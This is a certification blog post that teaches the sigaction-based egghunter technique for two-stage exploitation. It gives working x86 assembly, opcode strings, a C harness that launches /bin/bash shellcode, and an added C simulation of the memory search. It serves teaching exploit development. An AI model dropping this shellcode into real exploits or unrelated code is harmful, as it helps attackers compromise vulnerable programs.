This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1290
Assignment:
The assignment scope is to study the egghunter shellcode and create a working demo in which the payload is easily configurable.
Searching around on the internet, I found that the best paper describing the matter is skape's, hosted on www.hick.org: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
So what is an egghunter shellcode?
The paper describes the process of searching the virtual address space of a program and notes that it is extremely useful in exploitation. Some exploit vectors (for example buffer overflows) do not allow much payload data to be used, so the shellcode size is very limited. In these circumstances the attacker exploits the vulnerability in two stages: the first stage searches memory for the effective payload (the second stage), which is located somewhere else in the address space.
In the paper there are three different implementations of an egghunter shellcode. I decided to focus on the last one, based on the sigaction syscall. This implementation validates several addresses at once: the candidate address is passed to sigaction as a pointer, the kernel checks it before reading from it, and an invalid address makes the syscall return EFAULT instead of crashing the process. Here is my implementation of the egg hunter shellcode.
global _start

section .text

_start:
    ; zero ecx: the search starts from address 0
    xor ecx, ecx

align_page:
    ; page alignment: move to the last byte of the current page
    or cx, 0xfff
next_addr:
    ; default page size is 4096 bytes, so after the alignment this steps
    ; to the first byte of the next page; otherwise it is just the next address
    inc ecx
    ; sigaction syscall number (67)
    push byte 67
    pop eax
    ; execute the syscall with ecx as the act pointer
    int 0x80
    ; if EFAULT (-14, low byte 0xf2) the address is invalid: skip the whole page
    cmp al, 0xf2
    jz align_page
    ; load the EGG into eax
    mov eax, 0x50905090
    ; current address to check
    mov edi, ecx
    ; compare the current address with the EGG two times
    scasd
    jnz next_addr
    scasd
    jnz next_addr
    ; both matched: jump to the shellcode that follows the double EGG
    jmp edi
Adding the egg placeholder (0x50905090) twice in front of the execve shellcode lets us test it together with the egg hunter in our shellcode template C program.
#include <stdio.h>
#include <string.h>

#define EGG "\x90\x50\x90\x50"

/* second stage: the double EGG tag followed by the execve /bin/bash shellcode */
unsigned char code[] = EGG EGG
"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f"
"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

/* first stage: the egg hunter, with the EGG spliced in as the immediate of mov eax */
unsigned char egg[] =
"\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8"
EGG
"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

int main(void)
{
    printf("Egg length: %zu\n", strlen((char *)egg));
    printf("Shellcode length: %zu\n", strlen((char *)code));
    /* jump into the hunter; build with -fno-stack-protector -z execstack so the arrays are executable */
    int (*ret)(void) = (int (*)(void))egg;
    ret();
    return 0;
}
Here the EGG placeholder (the EGG define) and the main shellcode (the code array) are easily configurable.
Dirty+Small+Slow version:
Featured on Exploit-DB: https://www.exploit-db.com/exploits/45441/
I have successfully shrunk the egg hunter to 27 bytes by removing the page alignment instruction. This version is very slow (up to 2-3 minutes), because every address of an unmapped region is now probed one byte at a time instead of one probe per page, and a bit dirty, but under extreme size constraints it could be useful.
\x31\xc9\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf6\xb8EGG\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7
global _start

section .text
    ; zero ecx: the search starts from address 0
    xor ecx, ecx

_start:
    ; step to the next address (no page alignment in this version)
    inc ecx
    ; sigaction syscall number (67)
    push byte 67
    pop eax
    ; execute the syscall with ecx as the act pointer
    int 0x80
    ; if EFAULT, retry with the very next address
    cmp al, 0xf2
    jz _start
    ; load the EGG into eax
    mov eax, 0x50905090
    ; current address to check
    mov edi, ecx
    ; compare the current address with the EGG two times
    scasd
    jnz _start
    scasd
    jnz _start
    ; both matched: jump to the shellcode that follows the double EGG
    jmp edi
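To make the two search strategies concrete, here is an added C model (not part of this post, nor of skape's paper) that replays the hunter's control flow over a constructed 8-page address space. The probe() function stands in for the sigaction syscall: it fails with a simulated EFAULT when any of the 16 bytes the kernel would copy from the act pointer lie in an unmapped page, which is what the real hunter tests with cmp al,0xf2. The page map, the addresses and the tag positions are all constructed for the example. A lone copy of the tag is planted at 0x1100, as the hunter's own mov eax,0x50905090 leaves in memory, which is why the tag must be checked twice; the real double-tagged payload sits at 0x5300. Running hunt() once with page alignment (the 32-byte version) and once without (the 27-byte version) shows that both land on the same payload address, while the unaligned version needs far more syscalls because it walks unmapped pages byte by byte.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PAGE_SIZE  0x1000u
#define NPAGES     8u
#define EGG_TAG    0x50905090u   /* the tag used in the post: bytes 90 50 90 50 */
#define SIM_EFAULT (-14)         /* -EFAULT; its low byte is the 0xf2 the hunter tests */

/* Constructed model of a tiny 32 KiB address space (assumption for this example).
 * Unmapped pages are the regions a real hunter must skip without touching. */
static uint8_t space[NPAGES * PAGE_SIZE];
static int     mapped[NPAGES] = { 0, 1, 0, 0, 1, 1, 0, 1 };

/* Stand-in for the sigaction(2) probe. The kernel copies a 16-byte old_sigaction
 * from the act pointer, so the syscall fails with -EFAULT if any byte of
 * [addr, addr+16) is unmapped. */
static int probe(uint32_t addr)
{
    uint32_t first = addr / PAGE_SIZE, last = (addr + 15) / PAGE_SIZE;
    if (last >= NPAGES || !mapped[first] || !mapped[last])
        return SIM_EFAULT;
    return 0;
}

static uint32_t read32(uint32_t addr)
{
    uint32_t v;
    memcpy(&v, space + addr, sizeof v);   /* little-endian host assumed */
    return v;
}

static void put32(uint32_t addr, uint32_t v) { memcpy(space + addr, &v, sizeof v); }

/* Lay out the constructed scenario: a single tag at 0x1100 (the hunter's own
 * immediate), and the real double-tagged payload at 0x5300. */
void setup_space(void)
{
    memset(space, 0xcc, sizeof space);
    put32(0x1100, EGG_TAG);
    put32(0x1104, 0xdeadbeef);   /* not a second tag: the hunter must skip this */
    put32(0x5300, EGG_TAG);
    put32(0x5304, EGG_TAG);
    space[0x5308] = 0xcd;        /* payload would start here */
}

struct hunt_result {
    uint32_t      payload;   /* where `jmp edi` would land, or UINT32_MAX if not found */
    unsigned long probes;    /* number of simulated sigaction syscalls */
};

/* Mirror of the hunter's control flow. page_align=1 models the 32-byte version
 * (`or cx,0xfff` before `inc ecx` after an EFAULT); page_align=0 models the
 * 27-byte version, which simply retries the next byte. */
struct hunt_result hunt(int page_align)
{
    struct hunt_result r = { UINT32_MAX, 0 };
    uint32_t ecx = 0, edi;
    int fault = 1;   /* the aligned version enters through the alignment path */

    for (;;) {
        if (fault && page_align)
            ecx |= 0xfff;                        /* or cx,0xfff: skip the rest of this page */
        ecx++;                                   /* inc ecx */
        if (ecx >= NPAGES * PAGE_SIZE)
            return r;                            /* model exhausted; real code would wrap */
        r.probes++;
        fault = (probe(ecx) == SIM_EFAULT);      /* int 0x80 ; cmp al,0xf2 */
        if (fault)
            continue;                            /* jz _start */
        edi = ecx;                               /* mov edi,ecx */
        if (read32(edi) != EGG_TAG) continue;    /* scasd ; jnz next */
        edi += 4;
        if (read32(edi) != EGG_TAG) continue;    /* scasd ; jnz next */
        edi += 4;
        r.payload = edi;                         /* jmp edi */
        return r;
    }
}

int main(void)
{
    setup_space();
    struct hunt_result aligned = hunt(1), linear = hunt(0);
    printf("with page alignment: payload at 0x%x after %lu probes\n", aligned.payload, aligned.probes);
    printf("without alignment:   payload at 0x%x after %lu probes\n", linear.payload, linear.probes);
    return 0;
}
```

With this layout both runs report the payload at 0x5308, but the aligned search issues 8949 simulated syscalls against 21248 for the linear one, and the gap grows with every unmapped page: on a real process, where most of the 4 GiB space is unmapped, that is the difference between seconds and the minutes reported above.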